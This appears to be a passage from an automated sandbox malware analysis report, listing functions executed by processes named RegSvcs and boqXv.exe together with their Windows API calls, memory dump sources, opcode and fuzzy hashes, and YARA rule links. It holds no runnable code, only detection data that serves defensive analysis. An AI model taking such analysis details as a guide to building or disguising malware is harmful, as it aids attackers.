Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 066A2E86
GetCurrentThread.KERNEL32 ref: 066A2EC3
GetCurrentProcess.KERNEL32 ref: 066A2F00
GetCurrentThreadId.KERNEL32 ref: 066A2F59

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a39ba5889c775066088f0aaae48687e8e708bc72cfdd1867b72a42e7a9e94f70
Instruction ID: 387e80a17f1b23d3600401d281b20e6bba076fe69c5f96cedb19350b1f63812d
Opcode Fuzzy Hash: a39ba5889c775066088f0aaae48687e8e708bc72cfdd1867b72a42e7a9e94f70
Instruction Fuzzy Hash: 7E5134B4900749CFEB94CFA9D548BAEBBF1EB88314F24845EE019AB360D7349944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 066AB218 Relevance: 1.7, APIs: 1, Instructions: 200COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 066AB47E

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c733c84f442c6c9c00bd7e4f4b75b1ca1268ec327473cd0c930460f61189c862
Instruction ID: 56359130bce193ff909e1719a28d442e478109a777eaa317fe2c38932745d7b8
Opcode Fuzzy Hash: c733c84f442c6c9c00bd7e4f4b75b1ca1268ec327473cd0c930460f61189c862
Instruction Fuzzy Hash: 68813170A00B058FDBA4DF69D45476ABBF1FF88204F00892ED49ADBB50DB75A845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 066AD7C5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066AD922

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 96488e338e1c442c4df8626ae63b633ac062d4f059a8061c9f47abc1c695cbdc
Instruction ID: 6c77fec10e96ccad6b65ee0de453b76738cead500f4644bf0b4d96aa69b95dac
Opcode Fuzzy Hash: 96488e338e1c442c4df8626ae63b633ac062d4f059a8061c9f47abc1c695cbdc
Instruction Fuzzy Hash: D551CFB1C00349AFDF15CF99C984ADEBFB1BF48314F14826AE818AB260D7759955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 066DE4FA Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2456631124.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66d0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6e8ea25cb5c884b387ecfaf2e617ddfee831dddf9714dab9841c482303a83c
Instruction ID: cb452403f183e8a2a41f930dfd4754b8c0b8fa828eaba1ac8c2a0452120e3207
Opcode Fuzzy Hash: 7d6e8ea25cb5c884b387ecfaf2e617ddfee831dddf9714dab9841c482303a83c
Instruction Fuzzy Hash: CD41E171E043598FDB14DFB9D8047AEBBF5AFC9310F14856AD404AB681EB389845CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 066AD804 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066AD922

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3ef3a68fd6d3d8c64d203f94cfdd082492202c6919e40351ab6927c33395d12f
Instruction ID: dec845d4e003ee3c2d9c62653b91a8a0a0108418ca97fdd8a29f67bdcb125bf4
Opcode Fuzzy Hash: 3ef3a68fd6d3d8c64d203f94cfdd082492202c6919e40351ab6927c33395d12f
Instruction Fuzzy Hash: 2351CDB1D003499FDB14CFA9C994ADEBBB1FF48314F24822AE818AB250D7749981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 066AD810 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066AD922

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fbf1f85bd8ffc6cb9134c45f3a2ee055f1652e9b6784a528224a35af298128a1
Instruction ID: abced0e1bbeb77828815bf6d6c2e6525739ec24cdc0e4f4776cb3b365265b7d5
Opcode Fuzzy Hash: fbf1f85bd8ffc6cb9134c45f3a2ee055f1652e9b6784a528224a35af298128a1
Instruction Fuzzy Hash: 3341AEB1D00349AFDB14CF9AC984ADEFBB5FF48350F24812AE818AB250D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 066ACD6C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 066AFE91

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3b50271d704dff4984d8c0dbdd43fb5f3ad7ea418b44725e0b6bf5e7420ad239
Instruction ID: 27a112c12e2ffc9000331267b2d54eeb04812ad2c5695e3bb8baf966e4a96b38
Opcode Fuzzy Hash: 3b50271d704dff4984d8c0dbdd43fb5f3ad7ea418b44725e0b6bf5e7420ad239
Instruction Fuzzy Hash: 6B4149B5900349DFDB54CF99C488BAABBF5FB88314F24C448E519AB321D774A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 066A3048 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066A30D7

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d579d0884fdee614c3e61ad2c8cf90b88cfbc8e3e52a72315681e3de3a367317
Instruction ID: 67e56c895c5881ab2eb16ce6afa3563c9c393abcd54fd4b8fc684bc857af5cea
Opcode Fuzzy Hash: d579d0884fdee614c3e61ad2c8cf90b88cfbc8e3e52a72315681e3de3a367317
Instruction Fuzzy Hash: 9721D4B5D00348AFDB10CFAAD984ADEBBF8EB48310F14841AE914A7350D375A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066A3050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066A30D7

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 80378a26b9e24beec6c6dfbaa286d4ddc764f956a6f497fe13412faff47f8cad
Instruction ID: 708c8d0e2ba12647d82634583273a67adc068c665e5762198847bf7b2f477607
Opcode Fuzzy Hash: 80378a26b9e24beec6c6dfbaa286d4ddc764f956a6f497fe13412faff47f8cad
Instruction Fuzzy Hash: 6D21B2B5D003489FDB10CF9AD984ADEBBF4EB48310F14841AE914A7350D379A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02E67348 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 02E673C0

Memory Dump Source

Source File: 0000000E.00000002.2447808065.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2e60000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 15ef3590f5189d9b01970cdb07039e6ed5a5674b24054c207cdbc1f9a3efdf9a
Instruction ID: 1e13ac96ceb46ee49c5367eedc7b058543aba10a8a3abc85446de16008450eec
Opcode Fuzzy Hash: 15ef3590f5189d9b01970cdb07039e6ed5a5674b24054c207cdbc1f9a3efdf9a
Instruction Fuzzy Hash: D82135B1C406599FDB24CFAAC545BEEFBF0EB48354F15812AD858A7240D338A905CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02E67350 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 02E673C0

Memory Dump Source

Source File: 0000000E.00000002.2447808065.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2e60000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: f343dbf0b7c2c818fbe8a33ef524a3434a0b1f90709ea672cb6083b77b3b0e45
Instruction ID: d43d1196e01eeda15a56cf439bf6e2ceee8339b7550cb1aa0efc9e5116ff4ef2
Opcode Fuzzy Hash: f343dbf0b7c2c818fbe8a33ef524a3434a0b1f90709ea672cb6083b77b3b0e45
Instruction Fuzzy Hash: C71136B1C406599FDB24CF9AC545BEEFBF4FB48364F14812AD818A7640D738A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066AA1C0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,066AB4F9,00000800,00000000,00000000), ref: 066AB6EA

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3aa490b2ec3e436d640521380323972aa18a2635aa64bc13359eb6ff28fe8882
Instruction ID: 1832cc75a1910cb93022c0cea245cb8944eb5afb6dc5149b7600aa1481a2582e
Opcode Fuzzy Hash: 3aa490b2ec3e436d640521380323972aa18a2635aa64bc13359eb6ff28fe8882
Instruction Fuzzy Hash: 231106B6C003489FDB20CF9AD844B9EFBF4EB48310F10841AD515A7300C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066AB67B Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,066AB4F9,00000800,00000000,00000000), ref: 066AB6EA

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fc380b730c7259d33656b0e31d9efd984f688d384b5e066e3d5d918c1abc7417
Instruction ID: a440ffc44a0ae1a8c7079292e05c8294aaa9faa64caefc404a6e32054c3afa00
Opcode Fuzzy Hash: fc380b730c7259d33656b0e31d9efd984f688d384b5e066e3d5d918c1abc7417
Instruction Fuzzy Hash: 4E11CFB6C003098FDB24CF9AD944BDEFBF4AB48210F14841AD459A7610C379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066DE5D8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 066DE63F

Memory Dump Source

Source File: 0000000E.00000002.2456631124.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66d0000_RegSvcs.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 654ca60d10a6b5397030a881614196ed8fdf6a461477b66fba1b6170543a5c9d
Instruction ID: 60c1ff83a73ce4f2c918459cda65a0657cd050953f9c14c0a0acc3f02e83a233
Opcode Fuzzy Hash: 654ca60d10a6b5397030a881614196ed8fdf6a461477b66fba1b6170543a5c9d
Instruction Fuzzy Hash: DE11F3B1C006599FDB10CF9AC444BDEFBF4EF48324F15812AD918A7241D779A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066AB418 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 066AB47E

Memory Dump Source

Source File: 0000000E.00000002.2456382192.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_66a0000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 36fdbd4508a2ac871d982d14f1303ac413f8448324c9443dc3b1776ae84e50df
Instruction ID: 4821cb931bd2399cdfa8a592388edecd3b614458643fce60efa9dcc1b6fa47fa
Opcode Fuzzy Hash: 36fdbd4508a2ac871d982d14f1303ac413f8448324c9443dc3b1776ae84e50df
Instruction Fuzzy Hash: 7711DFB6C007498FDB20CF9AC844BDEFBF4EB88214F10841AD819A7714D379A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0156D006 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2446609764.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_156d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36af51602f39596401629ab94250d2c198190a8e375facb65b81ab43435aeb6
Instruction ID: 7bcf80bbfe8f9e315730031e9ed41f1ff67ba11fdb3713d9985541ae00ccad02
Opcode Fuzzy Hash: e36af51602f39596401629ab94250d2c198190a8e375facb65b81ab43435aeb6
Instruction Fuzzy Hash: 68318C755093C09FCB13CF64C990715BF75AF46214F29C5DBD8898F2A3D23A980ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0156D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2446609764.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_156d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66323c3c612599717ccd6e1720621c78eb93375a3766fc2263e8c6470a6a3470
Instruction ID: aba3aaaec9ecb668bb3132c650a6e2e050fc28efc4744098c7a14fa0918d8a4b
Opcode Fuzzy Hash: 66323c3c612599717ccd6e1720621c78eb93375a3766fc2263e8c6470a6a3470
Instruction Fuzzy Hash: F0212571604200DFDB15DF54D9C0B26BBB9FB84324F20C96DE8894F292D336D447CAA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: boqXv.exePID: 3216, Parent PID: 4056COMMON

Executed Functions

Function 00E51340 Relevance: 8.0, Strings: 6, Instructions: 526COMMON

Download Yara Rule

Strings

D@, xrefs: 00E51A64
D@, xrefs: 00E51968
D@, xrefs: 00E519A3
D@, xrefs: 00E51A9D
D@, xrefs: 00E51A22
D@, xrefs: 00E519DB

Memory Dump Source

Source File: 00000018.00000002.1363424978.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_e50000_boqXv.jbxd

Similarity

API ID:
String ID: D@$D@$D@$D@$D@$D@
API String ID: 0-3404515598
Opcode ID: 1a5b2d51fff51a1b40bb693592a33cddba44cee37480c2c4c40dbdc7fb9ed377
Instruction ID: 247f1d6558cda4542468ca7ce4cb2c23211190f228a89005962a75653fc698be
Opcode Fuzzy Hash: 1a5b2d51fff51a1b40bb693592a33cddba44cee37480c2c4c40dbdc7fb9ed377
Instruction Fuzzy Hash: 88225D70B00201CFD718EF39D99072A77A6FBC4309B209969D956AB798DB35EC89CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E51AE0 Relevance: 3.8, Strings: 3, Instructions: 66COMMON

Download Yara Rule

Strings

8q, xrefs: 00E51B75
D@, xrefs: 00E51B2F
D@, xrefs: 00E51B1D

Memory Dump Source

Source File: 00000018.00000002.1363424978.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_e50000_boqXv.jbxd

Similarity

API ID:
String ID: 8q$D@$D@
API String ID: 0-860540649
Opcode ID: 871d0bb0b5d8ec250e36f81c71c3f80e0354d09c0a792e5d823cfa5180455c8c
Instruction ID: d0af7de85c4debf7684c892b39dcbfbd3d088d3281536ffcbee3092ffeea6d5f
Opcode Fuzzy Hash: 871d0bb0b5d8ec250e36f81c71c3f80e0354d09c0a792e5d823cfa5180455c8c
Instruction Fuzzy Hash: F911E175A002089FC714EFB8E451BAD7BF6EBC4300F0040AAD609AB394EF349D06CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E50BC0 Relevance: 1.6, Strings: 1, Instructions: 338COMMON

Download Yara Rule

Strings

D@, xrefs: 00E50E24

Memory Dump Source

Source File: 00000018.00000002.1363424978.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_e50000_boqXv.jbxd

Similarity

API ID:
String ID: D@
API String ID: 0-2222373746
Opcode ID: 58f3dcbf5f2f632575c3f556f628452b20dcf7909fec44567917b557075fe11d
Instruction ID: 9892c5856ea6d28470def1621e8ee758f2ad3fde6de91dcf3fa969b66d878e8b
Opcode Fuzzy Hash: 58f3dcbf5f2f632575c3f556f628452b20dcf7909fec44567917b557075fe11d
Instruction Fuzzy Hash: D781B275A00304CFDB259FB5C51879ABBF2EF88304F148969E5166B7A4DF31AC89CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00E51240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

tPq, xrefs: 00E512F7

Memory Dump Source

Source File: 00000018.00000002.1363424978.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_e50000_boqXv.jbxd

Similarity

API ID:
String ID: tPq
API String ID: 0-789928099
Opcode ID: 17505efb73003537ba987c64725f3d4b5809b3e09990d78571302ec599a5f478
Instruction ID: cede4af554f3af68ad1aeb74981192a6c1b4819dc2c1f05d77d9c4c074fa9d77
Opcode Fuzzy Hash: 17505efb73003537ba987c64725f3d4b5809b3e09990d78571302ec599a5f478
Instruction Fuzzy Hash: 1821D6357406108FC758AB38C458E2D77E6AF8971636118B8E506DF7B1DE35DC82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E51C10 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1363424978.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_e50000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4bfb1e51411e7703278c090c6e15e3e845ce81bff41c7947a972e0dd577e00
Instruction ID: 60e11b93c3c4cd8b6324adb121ec39f900294f546e3dc09c36e92d40db1e862e
Opcode Fuzzy Hash: 9b4bfb1e51411e7703278c090c6e15e3e845ce81bff41c7947a972e0dd577e00
Instruction Fuzzy Hash: 7A019235E002059FCB40EFB8D9419ABFBF5FF89300710866AE5199B225EB70A915CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E50F9D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1363424978.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_e50000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81aae4c05f6a2c48994eae8bcb4135c5db529756ced5b27c88e06ba15bf30a0e
Instruction ID: 66f878f329da8757a0806fc562eb32f9a719bd33140acdcc456b4f173edf3bcc
Opcode Fuzzy Hash: 81aae4c05f6a2c48994eae8bcb4135c5db529756ced5b27c88e06ba15bf30a0e
Instruction Fuzzy Hash: 4DF01CB4A00305CFDB24EB74C6587AD7BF0AB48709F2418D8D902BB2A0DB758C89CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E508A8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1363424978.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_e50000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfce559d507b46c557b9adebdc650c7577a2b658939f661ff018c7cc4427fb65
Instruction ID: af975538ae015eff66ed6c076e35756751d3db9986619bb21b53a9b38e18d24f
Opcode Fuzzy Hash: dfce559d507b46c557b9adebdc650c7577a2b658939f661ff018c7cc4427fb65
Instruction Fuzzy Hash: 78D017B1D01219AF8B40EFB999091DEBBF8FF08251B100566D909F3200E2705A148BD1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: boqXv.exePID: 7584, Parent PID: 4056COMMON

Executed Functions

Function 00C61340 Relevance: 3.1, Strings: 2, Instructions: 591COMMON

Download Yara Rule

Strings

xX@snC<, xrefs: 00C61968, 00C619A3, 00C619DB, 00C61A22, 00C61A64, 00C61A9D, 00C61B1D, 00C61B2F
8q, xrefs: 00C61B75

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID: 8q$xX@snC<
API String ID: 0-390084659
Opcode ID: cd89682457db773f53f846a19023f0eef6eeb549e5e06b8dea1cfdb30c6cf863
Instruction ID: 1d79f0b90d20c6f2f34f0677064d85c6c0b282816c3449fd2cde32ed8529a20a
Opcode Fuzzy Hash: cd89682457db773f53f846a19023f0eef6eeb549e5e06b8dea1cfdb30c6cf863
Instruction Fuzzy Hash: F3324F34B04701CFD728EF74D890A6A77A6BB88305B28896DD8568F399DF35ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C60BC0 Relevance: 1.6, Strings: 1, Instructions: 336COMMON

Download Yara Rule

Strings

xX@snC<, xrefs: 00C60E24

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID: xX@snC<
API String ID: 0-893197048
Opcode ID: 5b8993e7624d63f36b287796b97c30bb61338d0c1aaa9e0439e4ba56f6ac572f
Instruction ID: 03dcb2dec58c453bda1b4c77b69129b6670f429a34c7f8f0f2748e6650089aa3
Opcode Fuzzy Hash: 5b8993e7624d63f36b287796b97c30bb61338d0c1aaa9e0439e4ba56f6ac572f
Instruction Fuzzy Hash: 5681A435A00304CFDB299BB4C454B9EBBF2EF88300F25856AE4166B365DF75AD85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C61230 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

tPq, xrefs: 00C612F7

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID: tPq
API String ID: 0-789928099
Opcode ID: 78ae9fac75f1b9d0819450374e0a4726b2ddffe4df3adbd4065d892215149eeb
Instruction ID: af180181401dc8e6dae96be4f5887e9461743b2503cf3d7cdf59636f1869508f
Opcode Fuzzy Hash: 78ae9fac75f1b9d0819450374e0a4726b2ddffe4df3adbd4065d892215149eeb
Instruction Fuzzy Hash: AC31F5347406108FC769AB38C458E2D3BE6AF8A71636514B9E806DF7B1DE35DC82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C61240 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

tPq, xrefs: 00C612F7

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID: tPq
API String ID: 0-789928099
Opcode ID: b89e3f7bb5006192a2ecce1e306a05c467d7bf2c954c35b8a6ed56ce82b0a02e
Instruction ID: 25a63efb5b6af526bd2acc36132e9eb61e1d886532ec07dbf3427511fd3766be
Opcode Fuzzy Hash: b89e3f7bb5006192a2ecce1e306a05c467d7bf2c954c35b8a6ed56ce82b0a02e
Instruction Fuzzy Hash: 002105357406108FC768AB38C458E2D77E6AF8971636518B8E906DF7B1DE36DC82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C61C00 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c23a33c4b7af57edb14545c987fc8d5ea97b02f68570ffc76896b84f3f5c365
Instruction ID: fb1bf9beb83ad0db57060990af1a0d1dd32893dcfba714d1d852a42fbe81f547
Opcode Fuzzy Hash: 3c23a33c4b7af57edb14545c987fc8d5ea97b02f68570ffc76896b84f3f5c365
Instruction Fuzzy Hash: 3911C236E002019FC741EFB4C8409DABBF1FF8930031186AAE514EB221EB309915CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C61C10 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7a11c1c2ca9a9283210b9be6b5ba832f62e60317bb1999956b8ec10de9deb19
Instruction ID: 33030784a0238f4aaa83c9d6684ca5d9ad50669e6d349e920cd3f7a5e5ed4875
Opcode Fuzzy Hash: f7a11c1c2ca9a9283210b9be6b5ba832f62e60317bb1999956b8ec10de9deb19
Instruction Fuzzy Hash: E5015275E002059FCB44EFB8D8819ABFBF5FF89310710866AE5199B225EB70A915CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C60880 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5cf9eb66b6ad8bbaaa975bc7c6f93ffc2d8fb8006f805c54ab3c5504643415b
Instruction ID: c7599ba32920ef7db0ae51be9ed0d6a982528b7cdedb1a45254a39e8385b8050
Opcode Fuzzy Hash: b5cf9eb66b6ad8bbaaa975bc7c6f93ffc2d8fb8006f805c54ab3c5504643415b
Instruction Fuzzy Hash: 14F0FF7090A395AFC7529B64AD154DB7FF4AE46210B1505ABE484E7162E2380F24CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00C60F9D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.1446034586.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_c60000_boqXv.jbxd

Similarity

API ID:
String ID:
API String ID:
